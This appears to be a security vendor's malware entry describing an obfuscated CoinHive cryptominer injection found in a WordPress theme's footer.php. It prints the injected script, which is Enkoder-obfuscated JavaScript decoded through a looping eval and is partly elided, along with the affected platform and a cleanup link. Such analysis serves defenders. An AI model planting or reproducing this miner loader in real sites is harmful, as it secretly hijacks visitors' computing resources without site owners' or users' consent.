Description:
One of many obfuscated CoinHive JavaScript miner injections, which usually means that it's used without webmaster's consent. This one uses the Hivelogic Enkoder for obfuscation.
< script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o="",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f("ufcnitnof x({)av" +
" r,i=o\"\"o,=l.xelgnhtl,o=;lhwli(e.xhcraoCedtAl(1/)3=!84{)rt{y+xx=l;=+;" +
"lc}tahce({)}}of(r=i-l;1>i0=i;--{)+ox=c.ahAr(t)i};erutnro s.buts(r,0lo;)f}\" +
""(1),9\"\\\\V\\\\P\\KC3V02\\\\26\\04\\01\\\\26\\" +
"00\\00\\\\21\\0N\\\\\\\\\\2100\\\\0/00\\\\.&05\\"+
..skipped...
"N9\\t4\\00\\\\O**421\\03\\02\\\\A900\\0%\\B636\\04\\"+
"-/00\\0\\\\\\\\Z\\31\\0>\\BP0L02\\\\27\\06\\01\\\"+
"\\\r&\\202203\\\\<t>.36\\0;\\<=21\\0q\\*'m kq,8.&e+\\6\" +
"\\"4\\4503\\\\bQ`O05\\0N\\QIUE0F01\\\\n]lC21\\0Z\\E]IY" +
"7Z00\\\\33\\00\\03\\\\07\\0x\\HP17\\0N\svy3smvqy~;v{q?" +
...skipped...
"\\\27\\03\\02\\\\6M02\\\\17\\05\\00\\\\+23>\\?(\""+
"}fo;n uret}r);+)y+^(i)t(eAodrCha.c(xdeCoarChomfrg.intr=So+7;12%={y+)i+l;i<0" +
";i=r(foh;gten.l=x,l\"\\\"\\o=i,r va){,y(x fontincfu)\"")" ;
while(x=eval(x));
//-->
//]]>
< /script>
We found this code at the bottom of the active WordPress theme's footer.php file.
Affecting: Mostly WordPress sites.
Mitigation How to clean a hacked WordPress site